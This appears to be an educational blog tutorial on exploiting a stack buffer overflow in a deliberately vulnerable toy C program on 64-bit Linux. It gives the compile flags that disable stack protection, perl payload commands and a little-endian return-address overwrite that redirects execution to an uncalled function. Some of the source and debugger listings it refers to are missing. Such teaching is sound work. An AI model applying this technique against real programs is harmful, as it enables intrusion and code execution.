How to exploit a buffer overflow vulnerability in Linux

In this simple howto we will see how the execution flow of a program can be redirected by exploiting a BOF (Buffer Overflow) vulnerability. If you are not familiar with this term or its use, please refer to the wiki page.

In this howto I will assume that all of you have (at least) a basic knowledge of:

  1. Assembly
  2. C
  3. gdb
  4. Function calling conventions

If you are missing one or more of the above points, I suggest you read up on them first.
A few further notes before we begin:

  1. My machine runs 64-bit Ubuntu 12.04 with kernel 3.5.0-40. Since it is a 64-bit machine, the addresses shown in this howto are 8 bytes long. This changes almost nothing in the technique itself!
  2. BOF exploits have become harder since Linux kernel 2.4 was released, due to the introduction of several protections (stack protection, no-execute flags, ASLR, etc.). Thus, to make the example programs in this howto work, we will compile them with the -fno-stack-protector flag. This flag simply tells the compiler not to enable stack protection.

Let us begin!

Take a look at the following main:

As you can see, the purpose of the above code is simply to read characters from the keyboard until an 'x' is entered, count the number of characters inserted, and finally say whether that number is even or odd.
Two considerations:

  • the function bof() is never called by main. Hence its body is never executed in the normal execution flow.
  • there is an error in the handling of the buffer buf: it is meant to hold only 10 characters, but nothing actually enforces that limit. Here is the BOF vulnerability!
    In fact, if we type more than 10 characters, the program will try to store all of them in buf, one by one, not only the first 10. Since the buffer is not large enough, the overflowing characters will be written to the adjacent memory locations.
    Hence, let's try to pass 50 chars to the program.
    A little note:
    the expression perl -e 'print "A"x50 . "x"' literally says "print A 50 times and append an x"; try it in a shell to see for yourself.
    Furthermore, we can simply place the characters in a separate file and then pass them to the program with: $./progr < file
    This works thanks to the standard input redirection operator (i.e. <).

    So the steps to perform are:

  • $gcc -g -fno-stack-protector bof.c -o bof
  • $echo "`perl -e 'print "A"x50 . "x"'`" > expl
  • $./bof < expl

    which gives us:

    Numer of insterted character is even
    [1] 17375 segmentation fault (core dumped) ./bof < expl


    What we get is an error message telling us that a segmentation fault happened. This happened because we wrote so many 'A's that we overwrote memory beyond the area reserved for the buf variable. In particular, the memory location holding the address to jump to when the return statement is executed has been corrupted, and this caused the fault. In fact, the fault happens exactly when the return statement is executed.
    Let's take a closer look using gdb (the GNU debugger):

    Let's look at the program source and set a breakpoint just before the return statement.

    OK, now let's run the program, feeding it the 50 'A's as shown before (inside gdb, for example: run < expl).

    The program has stopped at the breakpoint. Up to now it has not crashed yet. In fact, as said before, it will crash during the execution of the return statement, not before.
    So, let's look at the assembly code:

    As we can see, the return statement is carried out by the last three instructions. In particular, the very last one (retq) pops an 8-byte value from the top of the stack and jumps to it.
    Normally, at this point of the execution, the top of the stack would contain a valid address. So, let's step over two machine instructions (for example with gdb's stepi) and see what the top of the stack actually contains:

    As we can see, the top of the stack contains a run of apparently strange characters. If we are familiar with the ASCII table, we will notice immediately that what the stack actually contains is a run of 'A's (0x41)! So, what happened?
    Simply, we wrote enough 'A's to overwrite the stack from the location of the variable buf up to the place where the return address should have been.
    Therefore, when the retq instruction is executed, the popped address is not valid and a fault is raised.

    But what would happen if we wrote a valid address instead of a run of 'A's?
    You have already guessed, haven't you? The execution flow will be redirected to wherever that address points!
    So, let's do it!

    First of all, we need to write just enough chars to reach the location that is at the top of the stack when retq is executed, and no further. As the above stack snippet shows, 50 chars are too many.
    If we look at the above snippet, we will see that we have written 18 bytes too many. Hence the right length of our string is 50 - 18 = 32 bytes.
    Now, let's take the address of the function bof():

    The last 8 of those 32 bytes are the return address itself, so what we have to do now is write 24 'A's followed by an 8-byte address.
    In fact, even though the above address is shown using only 3 bytes, we have to write it out in full, i.e. on 8 bytes: 0x0000000000400634. Furthermore, my machine uses a little-endian representation (and probably yours does too), so the bytes of the address have to be written least significant byte first. The address in little-endian order, written byte by byte, becomes: \x34\x06\x40\x00\x00\x00\x00\x00.

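    From another terminal, let's modify the expl file by writing the new string into it, and let's launch the program again. Here the output of perl is redirected straight into the file, because some shells (bash, for instance) drop the \x00 bytes when they pass through a `...` command substitution:

    1. $perl -e 'print "A"x24 . "\x34\x06\x40\x00\x00\x00\x00\x00" . "x"' > expl
    2. $./bof < expl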

    which magically gives us:

    $./bof < expl
    Numer of insterted character is even
    WTF!
    [1] 18534 segmentation fault (core dumped) ./bof < expl


    In a nutshell, what happened is:

  • We have written just enough characters to completely overwrite the stack location holding the return address of the bof program.
  • The characters written in that precise memory location represent a valid address within the program.
  • The return statement, by executing the retq instruction, pops that address and jumps to it, thus executing the instructions found there (here, the body of bof(), which prints WTF!). The program still crashes afterwards, because bof() was entered without a proper call and has no valid address to return to.

    So, this was the way to redirect an execution flow by exploiting a buffer overflow. Obviously this was a really useless example; I leave it to you to think about what could be done with this kind of vulnerability. Bye.